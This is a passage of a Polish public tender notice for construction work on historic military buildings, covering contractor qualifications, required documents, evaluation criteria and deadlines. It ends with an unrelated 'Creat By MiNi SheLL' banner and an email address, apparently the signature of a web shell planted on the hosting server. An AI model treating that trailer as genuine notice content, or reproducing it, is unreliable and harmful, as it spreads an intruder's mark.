Wykonawca, w miejsce w/w poświadczeń może przedkładać dokumenty potwierdzające wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej, ich prawidłowe ukończenie, określone w § 1 ust. 1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817). 
W przypadku, gdy roboty budowlane zostały wykonane na rzecz Zamawiającego tj. 25 Wojskowy Oddział Gospodarczy należy je ująć w wykazie robót, lecz Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od Wykonawców udowodnienia faktu posiadania potencjału technicznego do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia tego warunku Wykonawca powinien wykazać,
iż dysponuje osobami odpowiedzialnymi za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
i wykształcenia, zakresem wykonywanych przez nie czynności oraz informacją 
o podstawie do dysponowania tymi osobami - wykonawca przy realizacji zamówienia powinien dysponować minimum 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi (wymagana przynależność do właściwej izby samorządu zawodowego oraz dokument potwierdzający uprawnienia - do oferty należy załączyć kopię). 
Osoba ta wykazać winna co najmniej 2 - letnią praktykę odbytą 
w obiektach zabytkowych zgodnie z Rozporządzeniem Ministra Kultury 
i dziedzictwa Narodowego z dnia 27.07.2011 roku (Dz. U. nr 165 poz.987).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli wykonawca wykaże się posiadaniem opłaconej polisy lub innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na kwotę min. 1 000 000,00 zł (słownie: jeden milion złotych). Ocena spełniania niniejszego warunku zostanie dokonana w oparciu o dostarczone dokumenty, wg formuły : spełnia -  nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>FORMULARZ OFERTOWY ­ wypełniony i podpisany na każdej stronie wg wzoru Zamawiającego (załącznik nr 1 do SIWZ). DOWÓD WNIESIENIA WADIUM.PEŁNOMOCNICTWO 
W przypadku podpisania oferty lub załączonego do niej jakiegokolwiek dokumentu i oświadczenia przez osobę nieuprawnioną do reprezentacji wprost z postanowień KRS lub CEIDG (Centralna Ewidencja i Informacja o Działalności Gospodarczej) należy dołączyć pełnomocnictwo, sporządzone zgodnie z wymaganiami Kodeksu Cywilnego - oryginał lub notarialnie potwierdzoną kopię dokumentu. 
- W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy pzp)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
2.Zamawiający dopuszcza zmianę terminu zakończenia robót w przypadku:
a)Klęsk żywiołowych uniemożliwiających realizację przedmiotu zamówienia,
b)Wstrzymanie robót przez uprawniony organ, z przyczyn nie wynikających 
z winy Wykonawcy.
3.Wszelkie zmiany umowy mogą być dokonywane jedynie za zgodą obu stron 
w formie pisemnej pod rygorem nieważności.
4.Zmiana umowy dokonana z naruszeniem przepisu ust. 1 jest nieważna.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.25wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzyskanie SIWZ następuje na wniosek złożony na adres Zamawiającego lub przez pobranie w siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2016 godzina 09:00, miejsce: Kancelaria Jawna (budynek nr 43) znajduje się na terenie 25 Wojskowego Oddziału Gospodarczego, gdzie obowiązuje system przepustek wydawanych przy wejściu, po okazaniu dowodu tożsamości.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com